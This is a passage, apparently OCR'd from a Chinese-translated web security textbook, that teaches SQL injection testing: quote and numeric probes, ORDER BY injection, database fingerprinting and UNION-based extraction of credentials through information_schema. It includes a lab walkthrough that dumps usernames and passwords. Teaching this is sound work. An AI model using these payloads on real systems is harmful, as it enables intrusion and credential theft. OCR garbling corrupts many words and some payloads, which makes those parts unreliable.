在 最 明显 的 情形 中 ， 只 需 回应 用 程序 提交 一 个 意外 输入 ， 就 可 以 发 现 并 最 终 确 定 一 个 SQL 注 
入 漏洞 。 在 其 他 情况 下 ,这 种 缺陷 可 能 非常 微妙 , 很 难 与 其 他 类 型 的 漏洞 或 不 会 造成 安全 威胁 的 
“ 民 性 ”有 寞 第 区 分 开 来 。 但 是 ， 可 以 按 顺 序 采 取 各 种 步 又 准确 查 明 绝 大 多 数 的 SQL 注 入 源 洞 。 











注解 ”在 应 用 程序 解析 过 程 中 (请 参阅 第 4 章 )， 应 该 已 经 确定 了 应 用 程序 访问 后 端 数 
据 库 的 各 种 情形 ; 现在 ， 应 当 在 所 有 这 些 情 形 中 探查 SQL 注入 漏洞 。 实 际 上 ， 提 交 给 
服务 器 的 任何 数据 都 能 够 以 用 己 无 法 察觉 的 方式 传送 给 数据 库 函 数 ， 并 且 可 能 得 到 不 
安全 的 处 理 。 因 此 ， 需 要 检查 所 有 这 些 数据 ， 以 查找 SQL 注入 漏洞 。 这 包括 所 有 URL 
参数 、cookie、POST 数 据 项 以 及 HTTP 消 息 头 。 无 论 哪 一 种 情况 ， 相 关 参 数 名 称 与 参数 
值 的 处 理 过 程 都 可 能 存在 漏洞 。 


提示 “在 探查 SQL 注入 漏洞 时 ， 一 定 要 确保 完全 遍历 任何 可 以 提交 专门 设计 的 输入 的 
多 阶段 过 程 。 应 用 程序 通常 会 从 几 个 请 求 中 收集 一 组 数据 ， 一旦 收集 到 全 部 的 数据 ， 
就 将 其 保存 在 数据 库 中 。 这 时 ， 如 果 仅 在 每 个 请 求 中 提交 专门 设计 的 数据 并 监控 应 用 
程序 对 那个 请 求 的 响应 ， 就 会 遗漏 许多 SQL 注 入 漏洞 。 





1. 注入 字符 串 效 据 
如 果 SQL 查 询 合 并 用 户 提 交 的 数据 ， 它 会 将 这 些 数 据 包含 在 单 引 写 中 。 为 利用 任何 SQL 注 入 
漏洞 ， 攻 击 者 需要 摆脱 这 些 引 号 的 束缚 。 





渗透 测试 步 又 

(D 提交 一 个 单 引号 作为 目标 查询 的 数据 。 观 察 是 否 会 造成 错误 ,或 结果 是 否 与 原始 结 
不 同 。 如 果 收 到 详细 的 错误 消息 ， 可 查阅 9.2.13 节 了 解 该 消息 的 含义 。 

CO) 如 果 发 现 错误 或 其 他 异常 行为 ， 同 时 提交 两 个 单 引 号 ， 看 会 出 现 什么 情况 。 数 据 库 使 
用 两 个 单 引号 作为 转 义 序列 ， 表 示 一 个 原 义 单 引号 ( literal single quote )， 因 此 这 个 序列 被 解释 














成 引用 字符 串 中 的 数据 ,而 不 是 结束 字符 串 的 终止 符 。 如 果 这 个 输入 导致 错误 或 异常 行为 消失 ， 
则 应 用 程序 可 能 易于 受 SQL 注 入 攻击 。 

(3) 为 进一步 核实 漏洞 是 否 存在 ， 可 以 使 用 SQL 连接 符 建 立 一 个 等 同 于 “ 民 性 ”输入 的 字 
符 串 。 如 果 应 用 程序 以 与 处 理 对 应 “良性 ”输入 相同 的 方式 处 理 专门 设计 的 输入 , 那么 它 很 可 
能 易于 受到 攻击 。 每 种 数据 库 使 用 的 字符 连接 方法 各 不 相同 。 在 易 受 攻击 的 应 用 程序 中 , 可 以 
注入 以 下 实例 构建 等 同 于 Foo 的 输入 : 
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DQ Oracle: '||'FOO 
DD MS-SQL: '+'FOO 
口 MySQL: ' 'F0O0 [注意 两 个 引号 之 间 有 一 个 空格 ] 


提示 “可 以 通过 在 特定 的 参数 中 提交 SQL 通配符 g% 来 确定 应 用 程序 是 否 正 与 后 端 数据 

¥Y 库 交互 。 例 如 ， 在 搜索 字段 中 提交 这 个 通配符 通常 会 返回 大 量 结 果 ， 表 明 输 入 正 被 传 
送 到 SQL 查 询 中 。 当 然 ， 这 不 一 定 表 示 应 用 程序 萄 受 攻击 一 一 只 是 应 该 深入 探查 以 确 
定 是 否 存 在 任何 具体 的 漏洞 。 


提示 使 用 单 引 号 查找 SQL 注 入 汤 洞 时 ， 应 特别 注意 浏览 器 处 理 返 回 的 页 面 时 发 生 的 

Y 任何 JavaScript 错 误 。 应 用 程序 经 常 在 JavaScript 中 返回 用 户 提交 的 输入 ,， 原 义 单 引号 将 
导致 JavaScript 解 释 器 中 出 现 错误 。 如 第 12 章 所 述 ， 在 响应 中 注入 任意 JavaScript 将 导致 
跨 站 点 脚本 攻击 。 





2. 注入 数字 数据 

如 有 果 SQL 碍 询 合 并 用 户 提 交 的 数字 数据 ,应 用 程序 仍然 会 将 它 包含 在 单 引 写 之 中 ,作为 字符 
捉 数据 进行 处 理 。 因 此 , 一 定 要 执行 前 面 描 述 的 针对 子 符 串 数据 的 渗透 测试 步 又 。 但 是 , 许多 时 
候 , 应 用 程序 会 将 数 子 数据 以 数字 格式 下 接 传 送 到 数据 库 中 ,并 不 把 它 放 入 单 引 号 中 。 如 果 前 面 
描述 的 测试 方法 无 法 检测 到 漏洞 ， 还 可 以 采取 以 下 针对 数字 数据 的 特殊 测试 步 又 。 




















渗透 测试 步 又 


(1) 答 试 输入 一 个 结 末 等 于 原始 数字 值 的 简单 数学 表达 式 。 例 如 ， 如 于 原始 值 为 2， 答 试 提 








交 1+1 或 3-1。 如 采 应 用 程序 做 出 相同 的 啊 应 ， 则 表示 它 多 于 受到 攻击 。 

(2) 如 采 证 实 被 修改 的 数据 会 对 应 用 程序 的 行为 造成 明显 影响 ， 则 前 面 描述 的 测试 方法 最 
为 可 靠 。 例 如 ， 如 果 应 用 程序 使 用 数字 化 PageID 参 数 指定 应 返回 什么 内 容 ， 则 用 1+1 代 蔡 2 得 
到 相同 的 结果 明显 表示 存在 SQL 注入 。 但 是 ， 如 果 能 够 在 数字 化 参数 中 搬入 任意 输入 ， 但 应 用 
程序 的 行为 却 没 有 发 生 改 变 ， 那 么 前 面 的 检测 方法 就 无 法 发 现 漏洞 。 

(3) 如 果 第 一 个 测试 方法 取得 成 功 ， 你 可 以 利用 更 加 复杂 的 、 使 用 特殊 SQL 关 键 字 和 语法 
的 表达 式 进 一 步 获 得 与 漏洞 有 关 的 证 据 。AscII 命 令 就 是 一 个 典型 的 示例 ,， 它 返回 被 提交 字符 
的 数字 化 ASCII 人 代码。 例如 ， 因 为 A 的 ASCII 值 为 6 6， 在 SQL 中 ， 以 下 表达 式 等 于 2。 

67-ASCII('A') 

(4) 如 有 果 单 引号 被 过 滤 挥 ， 那 么 前 面 的 测试 方法 就 没有 作用 。 但 是 ， 这 时 可 以 利用 这 样 一 
个 事实 : 即 在 必要 时 , 数据 库 会 隐 含 地 将 数字 数据 转化 为 字符 串 数 据 。 例 如 , 因为 字符 1 的 ASCII 
值 为 49， 在 SQL 中 ， 以 下 表达 式 等 于 2。 


51=ASCLIL(1) 
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提示 “在 探查 应 用 程序 是 否 存 在 SQL 注入 之 类 的 缺陷 时 ， 我 们 常常 会 犯 一 个 错误 ， 即 
忘记 某 些 字符 在 HTTP 请 求 中 具有 特 珠 含义 。 如 果 你 布 望 在 攻击 有 效 载荷 中 插入 这 些 字 
符 ， 必 须 谨 慎 地 对 它们 进行 URL 编 码 ， 确 保 应 用 程序 按 预料 的 方式 解释 它们 ， 特 别 是 
以 下 字符 。 
口 & 和 = 用 于 连接 名 / 值 对 ， 建 立 查询 字符 串 和 POST 数据 块 。 应 当 分 别 使 用 %26 与 
%3d 对 它们 进行 编码 。 


口 查询 字符 串 中 不 允许 使 用 空格 ,如 果 在 其 中 提交 空格 , 整个 字符 串 会 立即 终止 。 


必须 使 用 + 或 $20 对 其 编码 。 
口 由 于 + 用 于 编码 空格 ,如果 想 在 字符 串 中 使 用 +， 必 须 使 用 %2b 对 其 编码 。 因此， 
在 前 面 的 数字 化 示例 中 ，1+1 应 以 1g%2b1 的 形式 提交 。 
口 分 号 用 于 分 隔 cookie 了 字段， 必须 使 用 %3b 对 其 编码 。 
无 论 是 通过 拦截 代理 服务 器 直接 从 浏览 器 中 编辑 参数 值 ， 或 是 使 用 其 他 方法 进行 
编辑 ， 都 必须 使 用 这 些 编码 方法 。 如 果 没 有 对 相关 字符 进行 编码 ， 那 么 整个 请 求 可 能 
会 无 效 ， 或 提交 预期 之 外 的 数据 。 





一 般 来 说 ,前 面 描述 的 步 又 足以 确定 绝 大 多 数 的 SQL 注 入 源 洞 ,包括 许多 向 浏 览 瘟 返回 无 用 
结果 或 错误 信息 的 汤 洞 。 但 是 ， 在 某 些 情况 下 ， 可 能 有 必要 使 用 更 加 高 级 的 搁 巧 ， 如 时 间 延 迟 ， 
来 确定 漏洞 是 否 存 在 。 我 们 将 在 本 章 后 面部 分 描述 这 些 扩 巧 。 

3. 注入 查询 结构 

如 条 用 户 提交 的 数据 被 插入 SQL 查询 结构 ， 而 不 是 查询 中 的 数据 项 中 ， 这 时 实施 SQL 注入 攻 
击 只 需要 下 接应 用 有 效 的 SQL 语法 ， 而 不 需要 进行 任何 “ 转 义 ”。 

SQL 查询 结构 中 最 稼 见 的 注入 点 是 ORDER BY 子 句 。 ORDER BY 关键 字 接 受 某 个 列 名 称 或 编号 ， 
并 根据 该 列 中 的 值 对 结 采 集 进 行 排序 。 用 户 经 党 使 用 这 种 功能 对 浏览 硕 中 的 表 进 行 排序 。 

例如 ， 使 用 以 下 查询 可 以 检索 一 个 可 排序 的 图 书 表 : 


SELECT author, title, year FROM books WHERE publisher = 'Wiley' ORDER BY 
title ASC 


如 果 ORDER BY 中 的 列 名 称 title 由 用 户 指定 ， 就 没有 必要 使 用 单 引 号 ， 因 为 用 户 提交 的 数 
据 已 经 直接 修改 了 SQL 查询 的 结构 。 






























































提示 在 极 少 数 情况 下 ， 用 户 提 交 的 输入 可 能 会 指定 WHERE 子 句 中 的 列 名 称 。 由 于 这 
Y 些 输 入 也 没有 包含 在 单 引 号 中 ， 因 此 会 导致 与 前 面 介绍 的 漏洞 类 似 的 问题 。 笔 者 也 曾 


遇 到 一 些 以 用 户 提 交 的 参数 作为 表 名 称 的 应 用 程序 。 最 终 ， 有 大 量 应 用 程序 允许 用 户 
指定 排序 关键 字 ( ASC 或 DESC )， 可 能 认为 这 并 不 会 性 致 SQL 注入 攻击 。 








在 列 名 称 中 查找 SQL 注 入 将 洞 可 能 会 相当 困难 。 如 末 提 交 一 个 并 非 有 效 列 名 称 的 值 ， 查询 将 
导致 错误 。 这 意味 看 , 无 论 攻击 者 提交 路 径 裔 历 子 符 串 、 单 引号 、 双 引号 或 任何 其 他 任意 字符 串 ， 
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应 用 程序 帮会 返回 相同 的 啊 应 。 因 此 , 采用 第 用 的 目 动 模糊 测试 和 手动 测试 拉 巧 往往 会 遗 汤 某 些 
着 洞 。 如果 提交 用 于 探查 各 种 源 洞 的 标准 测试 学 符 串 全 部 导致 相同 的 啊 应 , 这 本 里 并 不 表示 出 现 
任何 错误 。 








注解 ”本 章 后 面部 分 介绍 的 一 些 传统 的 SQL 注 入 防御 措施 并 不 能 防范 用 户 提 交 的 列 名 
称 。 使 用 预 处 理 的 语句 或 转 义 单 引 号 也 不 能 阻止 这 类 SQL 注 入 。 因 此 ,现代 应 用 程序 


应 尤其 小 心 这 类 攻击 。 


渗透 测试 步 又 
(1) 记 下 任何 可 能 控制 应 用 程序 返回 的 结果 的 顺序 或 其 中 的 字段 类 型 的 参数 。 
(2) 提供 一 系列 在 参数 值 中 提交 数字 值 的 请 求 ， 从 数字 1 开始 ， 然 后 逐个 请 求 递增 。 
口 如 来 更 改 输入 中 的 数字 会 影响 结 来 的 顺序 ， 则 说 明 输 入 可 能 被 搬入 到 ORDER BY 本 

名 中。 在 SQL 中 ，ORDER BY 1 将 依据 第 一 个 列 进行 排序 。 然 后 ， 将 这 个 数字 增加 
到 2 将 更 改 数据 的 显示 顺序 , 以 依据 第 二 个 列 进行 排序 。 如 来 提交 的 数字 大 于 结 琳 集 
中 的 列 数 ， 查 询 将 会 失败 。 在 这 种 情况 下 ， 你 可 以 通过 使 用 以 下 字符 串 ， 检 查 是 否 
可 以 题 倒 结果 的 顺序 ， 从 而 硝 认 是 否 可 以 注入 其 他 SQL: 


1 ASC == 
1] DESC == 


口 如 朵 提交 数字 1 生成 一 组 结 末 ， 其 中 一 个 列 的 每 一 行 虱 包 含 一 个 1， 则 说 明 输 入 可 能 
锌 插入 到 查询 返回 的 列 的 名 称 中 。 例 如 : 


SELECT 1,title,year FROM books WHERE publisher='Wiley' 

















注解 ”在 ORDER BY 子 句 中 实施 SQL 注 入 与 其 他 注入 情形 有 很 大 区 别 。 此 时 ， 数 据 库 不 
会 接受 查询 中 的 UNION、WHERE、OR 或 AND 关 和 键 字 。 通常， 实施 注入 攻击 需要 攻击 者 指 
定 一 个 谱 套 查询 来 替代 参数 ， 如 用 ( select 1 where <<condition>> or 1/0=0) 


替代 列 名 称 ， 并 利用 本 章 后 面部 分 介绍 的 推断 技巧 。 对 于 支持 批量 查询 的 数据 库 (如 
MS-SQL )， 这 可 能 是 最 有 效 的 注入 攻击 方法 。 





9.2.4 “指纹 ”识别 数据 库 


迄今 为 止 , 我 们 所 描述 的 大 多 数 技巧 能 够 加 党 用 的 数据 库 平 台 发 动 有 效 攻击 , 任何 差别 部 已 
通过 对 语法 进行 细微 调整 得 到 解决 但是， 随 看 我 们 开始 分 析 更 高 级 的 利用 技巧 ,各 种 平台 之 间 
的 差异 变 得 更 加 明显 ， 因 此 了 解 所 针对 的 是 何 种 类 型 的 后 端 数 据 库 就 变 得 愈 发 重要 。 

我 们 已 经 知道 如 何 提 取 常 见 数据 库 的 版 本 字符 串 。 即 使 由 于 菏 种 原因 无 法 提取 到 版 本 信息 ， 
我 们 还 是 可 以 使 用 其 他 方法 识别 数据 库 , 一 种 最 可 靠 的 方法 是 根据 数据 库 连 接 字 符 串 的 不 同方 式 
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进行 识别 。 在 控制 某 个 字符 串 数 据 项 的 查询 中 , 可 以 在 一 个 请 求 中 提交 一 个 特殊 的 值 ， 然 后 测试 
各 种 连接 方法 ， 以 生成 那个 字符 串 。 如 采 得 到 相同 的 结果 ， 就 可 以 确定 所 使 用 的 数据 库 类 型 。 下 
面 的 示例 说 明和 常用 的 数据 库 如 何 构 建 services 字 符 串 。 

DQ Oracle: 'serv'||'ices,' 

DD MS-SQL: 'serv'+'ices' 

口 MySQL: 'serv' 'ices' [注意 中 间 有 空格 ] 

如 果 注 入 数字 数据 , 则 可 以 使 用 下 面 的 攻击 字符 串 来 识别 数据 库 。 每 个 数据 项 在 目标 数据 库 
中 的 求 值 结 有 末 为 0， 在 其 他 数据 库 中 则 会 导致 错误 。 

DD Oracle: BITAND(1,1)-BITAND(1,1) 

DUD MS-SQL: @@PACK RECEIVED-@@PACK_ RECEIVED 

DQ MySQL: CONNECTION_ID()-CONNECTION_ID() 

















注解 MS-SQL 和 Sybase 数 据 库 起 源 相 同 ， 因 此 它们 在 表 结 构 、 全 局 变量 和 存储 过 程 


方面 存在 许多 相似 之 处 。 实际 上 , 后 文 描述 的 绝 大 多 数 针 对 MS-SQL 的 攻击 技巧 同样 也 
和 运用 村 Sybase。 








在 识别 数据 库 时 ，MySQL 如 何 处 理 某 些 行内 注释 (inline comment ) 也 是 一 个 值得 关注 的 问 
题 。 如 果 一 个 注释 以 感叹 号 开头 ,接着 是 数据 库 版 本 字符 串 , 那么 只 要 数据 库 的 实际 版 本 等 于 或 
高 于 那个 字符 串 ， 应 用 程序 就 会 将 注释 内 容 解释 为 SQL; 否则 ， 应 用 程序 就 会 忽略 注释 内 容 ， 将 
它 作 为 注释 处 理 。 与 C 中 的 预 处 理 指令 类 似 ， 程 序 员 也 可 以 对 这 一 点 加 以 利用 ， 编 写 出 根据 所 使 
用 的 数据 库 版 本 进行 处 理 的 不 同 代码 。 攻 击 者 还 可 以 利用 它 来 识别 数据 库 的 实际 版 本 。 例 如， 如 
果 使 用 的 MySQL 版 本 高 于 或 等 于 3.23.02, 注入 下 面 的 字符 串 将 使 SELECT 语句 的 WHERE 子 句 为 假 : 




















/*132302 and 1=0*/ 


9.2.5 ” ”UNION 操作 稚 


SQL 使 用 UNION 操 作 符 将 两 个 或 几 个 sELECT 语 句 的 结果 组 合 到 独立 一 个 结果 中 。 如 果 一 个 
Web 应 用 程序 的 SELECT 语句 存在 SQL 注入 漏洞 , 通常 可 以 使 用 UNION 操 作 符 执 行 男 一 次 完全 独立 
的 查询 ， 并 将 它 的 结果 与 第 一 次 查询 的 结果 组 合 在 一 起 。 如 果 应 用 程序 问 浏 览 絮 返回 查询 结果 ， 
那么 就 可 以 使 用 这 种 技巧 从 应 用 程序 中 提取 任意 的 数据 。 所 有 的 主流 DBMS 产 品 者 支持 UNION， 
对 于 直接 返回 查询 结果 的 情况 ，UNION 是 检索 信息 最 快捷 的 方式 。 

我 们 再 回 到 那个 允许 用 户 根 据 作 者 、 书 名 、 出 版 商 和 其 他 条 件 搜索 书籍 的 应 用 程序 。 搜 索 由 
Wiley 出 版 的 书籍 将 引起 应 用 程序 执行 以 下 查询 : 

SELECT author,title,year FROM books WHERE publisher = 'Wiley'’ 

假设 这 个 查询 返回 下 面 这 组 结 


























9.2 注入 SQL 221 


作 者 书 名 出 版 年 份 
Litchfield The Database Hacker’s Handbook 2005 
Anley The Shellcoder’s Handbook 2007 


前 文 已 经 介绍 了 攻击 者 是 如 何 问 搜 索 功 能 提交 专门 设计 的 输入 、 破 坏 查 询 中 的 WHERE 子 钉 、 
返回 数据 库 中 保存 的 所 有 书籍 的 。 一 个 更 有 趣 的 攻击 是 使 用 UNION 操 作 符 注入 另外 一 个 SELECT 
查询 , 并 将 查询 结 末 附加 在 第 一 次 查询 的 结束 之 后 。 第 二 次 查询 能 够 从 另 一 个 完全 不 同 的 数据 库 
表 中 提取 数据 。 例 如 ， 输 入 以 下 搜索 项 : 

Wiley' UNION SELECT username,password,uid FROM users-- 


2— » 
应 用 程序 将 执行 以 下 查询 : 
SELECT author,title,year FROM books WHERE Publisher = 'Wiley'! 
UNION SELECT username,pPassword,uid FROM users——! 


这 个 查询 返回 最 初 的 搜索 结果 ， 接 者 是 用 户 表 的 内 容 : 


























作 者 书 名 出 版 年 份 
Litchfield The Database Hacker’s Handbook 2005 
Anley The Shellcoder’s Handbook 2007 
admin rOO0trOx 0 

cliff Reboot ] 


注解 ”如 果 使 用 UNION 操 作 符 组 合 两 个 或 几 个 SELECT 查询 的 结果 ， 那 么 组 合 结果 的 列 
名 称 与 第 一 个 SELECT 查询 的 列 名 称 完 全 相同 。 如 前 面 的 表格 所 示 ， 用 户 名 出 现在 





author 列 中 ， 密 码 出 现在 title 列 中 。 这 表示 应 用 程序 在 处 理 被 修改 的 查询 结果 时 ， 
它 无 法 检测 出 返回 的 数据 实际 上 来 自 一 个 完全 不 同 的 表 。 











这 个 简单 的 示例 次 明 ，UNION 操 作 符 可 在 SQL 注入 攻击 中 发 挥 非常 巨大 的 作用 。 但 是 ， 在 利 
用 它 发 动 攻击 之 前 ， 攻 击 者 有 必要 了 解 它 的 两 个 重要 限制 。 
口 如 果 使 用 UNION 操 作 符 组 合 两 个 查询 的 结果 ,这 两 个 结果 必须 结构 相同 。 也 就 是 说 ,它们 
的 列 数 必须 相同 ， 必 须 使 用 按 相同 顺序 出 现 的 相同 或 羔 容 的 数据 类 型 。 
口 为 注入 为 一 个 返回 有 用 结 琳 的 查询 ， 攻 击 者 必须 知道 他 所 针对 的 数据 库 表 的 名 称 以 及 有 
天 列 的 名 称 。 
现在 让 我 们 更 加 深入 地 分 析 前 一 个 限制 。 假 设 攻击 者 试图 注入 为 一 个 返回 错误 列 数 的 查询 。 
他 提交 以 下 输入 : 
Wiley' UNION SELECT username,password FROM users-- 


最 初 的 查询 返回 3 列 ， 而 注入 的 碍 询 返 回 2 列 。 因 此 ， 数 据 库 返回 以 下 错误 : 


CRA-01789: query block has incorrect number of result columns 
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假设 攻击 者 试图 注入 为 一 个 列 内 数据 类 型 不 兼容 的 查询 。 他 提交 以 下 输入 : 

Wiley' UNION SELECT uid,username,password FROM users-- 

这 样 ,数据库 将 尝试 把 第 二 个 查询 的 密码 列 ( 其 中 为 学 符 串 数据 ) 与 第 一 个 查询 的 年 代 列 ( 其 
中 为 数字 数据 ) 组 合 起 来 。 因 为 字符 串 数据 无 法 转换 为 数字 数据 ， 这 个 语句 造成 一 个 错误 : 


ORA-01790: expression must have same datatype as corresponding expression 





























4 注解 ”上面 是 Oracle 返 回 的 错误 消息 。 其 他 数据 库 返 回 的 相应 错误 消息 请 参阅 9.2.13 节 。 





在 许多 现实 例子 中 ,数据 库 返 回 的 错误 消息 将 被 应 用 程序 截获 ,并 不 显示 在 用 户 的 浏览 右上 
因此 ， 如 果 想 要 查 明 第 一 个 查询 的 结构 ， 也 许 只 能 纯粹 靠 猪 测 。 但 是 ， 事实 并 非 如 此 。 可 以 利用 
以 下 三 点 帮助 简化 这 项 任务 。 
口 为 使 注入 的 查询 能 够 与 第 一 个 查询 结合 ， 它 不 一 定 要 使 用 完全 相同 的 数据 类 型 。 但 是 ， 
它们 必须 相互 兼容 ， 也 就 是 说 ， 第 二 个 查询 中 的 每 种 数据 类 型 要 么 必须 与 第 一 个 查询 中 
的 对 应 类 型 完全 相同 ， 要 么 必须 隐 含 地 转换 到 那个 类 型 。 数 据 库 会 将 一 个 数字 值 隐 含 地 
转换 为 一 个 字符 串 什 。 实 际 上 ，NULL 值 可 被 转换 成 任何 数据 类 型 。 因 此 ， 如 采 不 知道 某 
个 特殊 字段 的 数据 类 型 ， 只 需 在 那个 字段 输入 SELECT NULL 即 可 。 

口 如 采 数 据 库 返 回 的 错误 消 且 被 应 用 程序 截获 ， 还 是 可 以 轻易 确定 注入 的 查询 是 否 得 以 执 
行 。 因 此 ， 如 果 查 询 已 经 执行 ， 那 么 应 用 程序 第 一 个 查询 返回 的 结果 后 面 会 增加 其 他 结 
果 。 可 以 据 此 进行 系统 的 推测 ， 直 到 查 明 需要 注 和 人 的 查询 结构 。 

口 许多 时 候 ， 只 需 在 第 一 个 查询 中 确定 一 个 使 用 字符 串 数据 类 型 的 字段 就 可 以 达到 自己 的 
目的 。 这 足以 允许 注入 任意 返回 字符 串 数 据 的 查询 并 获得 其 结果 ， 帮 助 系统 性 地 从 数据 
库 中 提取 任何 想 要 的 数据 。 




































































渗透 测试 步 双 


攻击 的 首要 任务 是 碍 明 应 用 程序 执行 的 最 初 查 询 所 返回 的 列 数 .有 两 种 方法 可 以 完成 这 项 








任务 已 

(1) 可 以 利用 NULL 被 转换 为 任何 数据 类 型 这 一 事实 ， 系 统 性 地 注 人 包含 不 同 列 数 的 查询 ， 
直到 注入 的 查询 得 到 执行 ， 例 如 : 

' UNION SELECT NULL-— 


' UNION SELECT NULL, NULL-—- 
' UNION SELECT NULL, NULL, NULL-—-— 


查询 得 到 执行 就 说 明 使 用 了 正确 的 列 数 。 如果 应 用 程序 不 返回 数据 库 错 误 消 息 , 仍然 可 以 
了 解 注 和 的 碍 询 是 否 成 功 执行 ， 因 为 会 收 到 另外 一 行 数据 ， 其 中 包 侣 NULI 或 一 个 空 字符 串 。 
注意 ,注入 行 可 能 只 包含 空 单 元 格 ， 因 此 不 容易 得 知 何 时 以 HTML 提 交 。 出 于 这 个 原因 ， 进 行 
攻击 的 最 好 是 查看 行 啊 应 。 
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(2) 确定 所 需 的 列 数 后 ， 下 一 项 任务 就 是 找到 一 个 使 用 字符 串 数 据 类 型 的 列 ， 以 便 通 过 它 
从 数据 库 中 提取 出 任意 数据 。 和 前 面 一 样 ， 可 以 通过 注入 一 个 包含 NULL 值 的 查询 ， 并 系统 性 
地 用 a 代 巷 每 个 NULL， 从 而 完成 这 项 任务 。 例 如 ， 如 来 知道 查询 必须 返回 3 列 ， 可 以 注入 以 下 
查询 : 

' UNION SELECT ‘a', NULL, NULL-—— 


' UNION SELECT NULL, 'a', NULL-—— 
' UNION SELECT NULL, NULL, :aa 一 


如 果 注 入 的 查询 得 到 执行 ,将 看 到 为 一 行 包含 a 值 的 数据 ， 然 后 就 可 以 使 用 相关 列 从 数据 
库 中 提取 数据 。 





注解 ”在 Oracle 数 据 库 中 ， 每 个 SELECT 语句 必须 包含 一 个 EROM 属 性， 因此 ， 无 论 列 数 
是 否 正确 ， 注 入 UNION SELECT NULL 将 产生 一 个 错误 。 可 以 选择 使 用 全 局 可 访问 表 


( globally accessible table ) DUAL 来 满足 这 一 要 求 。 例 如 : 


' UNION SELECT NULL FROM DUAL-- 








如 果 已 经 确定 注入 的 查询 所 需 的 列 数 , 并 且 已 经 找到 一 个 使 用 字符 串 数 据 类 型 的 列 ， 就 能 够 
提取 出 任意 数据 。 一 个 简单 的 概念 验证 测试 是 提取 数据 库 的 版 本 字符 串 , 可 以 对 任何 数据 库 管 理 
系统 ( DBMS ) 进 行 测试 ,例如 ,如果 查 询 一 共有 3 列 , 第 一 列 可 以 提取 字符 串 数据 , 可 以 在 MS-SQL 
和 MySQL 中 注入 以 下 查询 提取 数据 库 版 本 : 

' UNION SELECT @@version,NULL,NULL-- 

对 Oracle 注 入 以 下 查询 将 得 到 相同 的 结果 : 

' UNION SELECT banner,NULL,NULL FROM Vv$Vversion—— 

在 前 面 介绍 的 匈 受 攻击 的 图 书 搜索 应 用 程序 中 ， 可 以 使 用 这 个 字符 串 作为 搜索 项 来 获得 
Oracle 数据 库 的 版 本 : 


作 者 书 名 出 版 年 份 
CORE 9.2.0.1.0 Production 
NLSRTL Verslon 9.2.0.1.0 - Production 














Oracle91 Enterprise Edition Release 9.2.0.1.0 - Production 
PL/SQL Release 9.2.0.1.0 - Production 
TNS for 32-bit Windows: Version 9.2.0.1.0 - Production 








当然 , 里 然 数 据 库 版 本 字符 串 值 得 我 们 注意 ， 并且 可 带 助 搜索 特殊 软件 中 的 源 洞 ,但 是 , 在 
多 效 情况 下 , 我 们 仍然 对 从 数据 库 中 提取 数据 更 感 兴趣 。 要 做 到 这 一 点 ,渗透 测试 员 需 要 解除 前 
面 描述 的 第 二 个 限制 ， 也 就 是 说 ， 需 要 知道 想 要 攻击 的 数据 库 表 的 名 称 以 及 相关 列 的 名 称 。 
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9.2.6 ”提取 有 用 的 数据 

为 了 从 数据 库 中 提取 有 用 的 数据 , 通常 需要 了 解 表 以 及 包含 预 访问 的 数据 所 属 列 的 名 称 。 大 
型 企业 DBMS 中 包含 大 量 数据 库 元 数据 ， 可 以 查询 这 些 数据 查 明 数据 库 中 每 一 个 表 和 列 的 名 称 。 
在 各 种 情况 下 , 提取 有 用 数据 所 使 用 的 方法 完全 相同 ; 但 是 , 在 不 同 数据 库 平台 上 的 应 用 细节 各 
不 相同 。 




















9.2.7 ”使 用 UNION 提 取 数 据 


下 面 我 们 将 分 析 一 个 攻击 ， 虽 然 该 攻击 针对 的 是 MS-SQL 数 据 库 ， 但 它 采 用 的 攻击 方法 适用 
于 所 有 数据 库 技 术 。 以 用 户 维护 联系 人 列表 及 查询 和 更 新 联系 人 信息 的 通讯 录 应 用 程序 为 例 。 如 
果 用 户 在 通讯 录 中 搜索 名 为 Matthew 的 联系 人 ， 浏 览 絮 将 提交 以 下 参数 : 

Name=Matthew 


应 用 程序 将 返回 以 下 绪 末 : 








人 名 电子 邮件 地 址 
Matthew Adamson handytrick(@Wemail.com 


尝试 访问 


http://mdsec.net/addressbook/32/ 





首先 ， 我 们 需要 确定 请 求 的 列 数 。 对 单一 列 进行 测试 导致 了 以 下 错误 消息 : 


Name=MatthewIgs20unlong20selLect 和 20mnu11- 一 














All] gqueries combined using a UNION, INTERSECT or EXCEPT operator must 








have am egual number of expressions in their target lists. 
我 们 添加 另 一 个 NuLL,， 并 得 到 同样 的 错误 。 于 是 我 们 继续 添加 NULL， 直 到 查询 被 执行 ， 并 
在 结 来 表 中 生成 为 一 个 数据 项 ， 如 下 所 示 : 


Name=Matthew'%20union%®%20select%20nul1l,nullnull,null,null—— 














人 名 电子 邮件 地 址 
Matthew Adamson handytrick(@Wemail.com 
车] [ 空 ] 


现在 我 们 验证 查询 的 第 一 列 是 否 包含 字符 串 数 据 : 


Name=Matthew'%®%20union%20select%20'a' null,null,null,null-— 





人 名 电子 邮件 地 址 
Matthew Adamson handytrick(@Wemail.com 
[al 
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接 下 来 , 需要 查 明 可 能 包含 有 用 信息 的 数据 库 表 和 列 的 名 称 。 为 此 , 我们 需要 查询 元 数据 表 
information _ schema.columns ， 其 中 包含 数据 库 中 的 所 有 表 和 列 名 称 的 详细 资料 。 使 用 以 下 请 求 可 
以 检索 上 述 信息 : 


Name=Matthew'%®20unilion%®%20select%20table name,column name,null,null, 








null%S20from$20information schema,.,columns—-— 


人 名 电子 邮件 地 址 
Matthew Adamson handytrick(@Wemail.com 
shop items Price 
shop items Prodid 
shop items Prodname 
addr book Contactemail 
addr book Contactname 
Users Username 
Users Password 





从 以 上 绪 采 可 以 确定 ,很 明显 ， 我 们 可 以 从 用 户 表 开始 提取 数据 。 这 时 使 用 以 下 查询 : 


Name=Matthew'$®20UNION®20select%®%20username,password,null,null,null%20C 
from%20uSers--— 


人 名 电子 邮件 地 址 
Matthew Adamson handytrick(@Wemail.com 
administrator fme09 
dev uber 
marcus 8pinto 
smith twosixty 
jlo 6kdown 


提示 MS-SQL、MySQL 和 许多 其 他 数据 库 ( 包括 SQLite 和 Postgresql ) 均 支 持 
Y information schema。 它 主要 用 于 保存 数据 库 元 数据 ， 这 也 使 它 成 为 探查 数据 库 的 


攻击 者 的 主要 目标 。 需 要 注意 的 是 ， Oracle 庆 不 支持 该 方案 。 对 Oracle 数 据 库 实施 攻击 
时 ， 攻 击 方 法 在 其 他 各 方面 可 能 完全 相同 。 人 但是， 需要 使 用 查询 SELECT 


table name,column name FROM all tab nt 的 信 
息 。 (使 用 user tab columns 表 以 仅 针对 当前 数据 库 。) 通常 ， 在 分 析 大 型 数据 库 以 
A 


